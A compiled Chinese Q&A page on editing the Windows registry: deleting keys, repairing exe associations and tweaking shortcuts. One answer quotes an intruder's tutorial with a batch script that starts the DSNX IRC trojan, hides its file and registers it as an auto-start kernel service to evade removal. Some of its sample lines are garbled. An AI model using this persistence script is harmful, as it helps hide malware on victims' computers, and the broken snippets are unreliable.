去注册表
Ⅰ 如何运行注册表,找到卸载软件不彻底时留下的文件夹,去删除它!
1,进入注册表的方法,在开始菜单中打开“运行”,也可以直接按win+r启动运行。
2,在打开内的运行框中,容输入regedit命令,按确定,
3,这就进入了注册表,进入之后,点菜单上的“编辑”,在打开的下拉菜单中选择“查找”。
4,然后用ctrl+f查找“所要删除文件的名字''将鼠标会定位到懿个文件夹,直接吧它删除就可以了。
Ⅱ 自己创建了个reg文件 导入到注册表里去了 怎么删除
运行regedit,进入注册表,
找到和删除
HKEY_LOCAL_MACHINE\SOFTWARE\CAPCOM\STREET FIGHTER IV]
"InstallDir"="X:\\CAPCOM\\Street Fighter IV\\"
就OK了!Windows优化大师应该可以清理掉,不过我专觉得不删问题不大
但是属会影响到你游戏,最好还是删了吧
Ⅲ 怎么去删除注册表[HKEY_CURRENT_USER\Software\RocketDock]的所有项值!!一步步来!我是电脑小白
你好
试试下面方法
步骤/方法
1.依次打开“开始菜单——所有程序——附件”
2.右击专“命令属提示符”,单击“以管理员身份运行”
3.在命令提示符窗口下键入
reg delete "HKEY_CURRENT_USER\Software\RocketDock" /f
Ⅳ 修改注册表之后所有应用程序都打不开了 注册表也打不开cmd也进不去 求助求助!
你 好
把下面 代码 用 记事本 保存 reg 文件版
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"
双击导入权 即可
Ⅳ 怎样消除电脑记录,有关注册表之类
可以使用系统类软件清除,例如360安全卫士、金山卫士、网络卫士等,还可以用优化版大师有直接权清理注册表垃圾的。一定要进入注册表的话请千万慎改。
一些清除方法:
1.在“开始”-------“运行”---------键入“msonfig”后选择“启动‘就进入注册表开机运行程序设置了,在口内取消√来控制开机不要运行的程序。
2.在开始”-------“运行”---------键入“Regedit”来进入注册表,可以根据要调解的选项进行查找修改。 这些都要慎用,如果取消了不改取消的东西或者修改的不恰当,会造成电脑没有声音,程序不运行还可能死机。那样就得重做系统了。
Ⅵ 如何新建一个regedit文件,打开运行一下就可以把自己些的信息添加到注册表上面去
打开记事本新建一个.reg文件就可以了。
补充:具体的写法建议参考以下说明文字:
如何用批处理文件来操作注册表
在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)
关于注册表的操作,常见的是创建、修改、删除。
1.创建
创建分为两种,一种是创建子项(Subkey)
我们创建一个文件,内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]
然后执行该脚本,你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为“hacker”的子项。
另一种是创建一个项目名称
那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"Invader"="Ex4rch"
"Door"=C:\\WINNT\\system32\\door.exe
"Autodos"=dword:02
这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下
新建了:Invader、door、about这三个项目
Invader的类型是“String Value”
door的类型是“REG SZ Value”
Autodos的类型是“DWORD Value”
2.修改
修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit /s)即可。
3.删除
我们首先来说说删除一个项目名称,我们创建一个如下的文件:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Ex4rch"=-
执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被删除了;
我们再看看删除一个子项,我们创建一个如下的脚本:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已经被删除了。
相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了,记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。
samlpe1:如上面的那个例子,如想生成如下注册表文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只需要这样:
@echo Windows Registry Editor Version 5.00>>Sample.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg
samlpe2:
我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动]
@REM 这样不是更安全^_^.
Ⅶ 注册表进不去怎么办
1.管理员是通过gpedit.msc禁用的,或者通过注册表本身禁用
2.改个名就能用了,在c:\windows\目录下,只要不改扩展名.
Ⅷ 注册表编辑器开机自启怎么去了
用WINDOWS优化大师的“开机速度优化”功能来查看注册表编辑器在哪里启动,把它给取消启动就行了。
Ⅸ 如何修改注册表去掉 快捷方式 到 这几个字
你好,不需要安装任何东西,只要修改一下注册表就可以了,我把相关的注册表项写成下面的代码,你只要把下面的代码复制到记事本中,保存为.reg文件,就可以直接导入注册表了。;--------------------------------------------------Windows Registry Editor Version 5.00;删除图标“快捷方式”的字样
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer]
"Link"=hex:00,00,00,00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
"Link"=hex:00,00,00,00;--------------------------------------------------【附】如果你想要手动修改注册表,也可以,如果你知道上面的代码是什么意思的话。运行 regedit ,按上面代码的路径分别找到对应位置,把相应位置的Link项改成相应的值。如果你不知道上面的代码什么意思,或者不会手动修改注册表,或者还有其他什么问题,欢迎继续追问,我将教你如何去做。
Ⅹ 注册表去开机自检
打开注册表来(运行里自输入:regedit)找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager
再找到右边这个值:BootExecute把里面的数据全部删除就可以了。。。。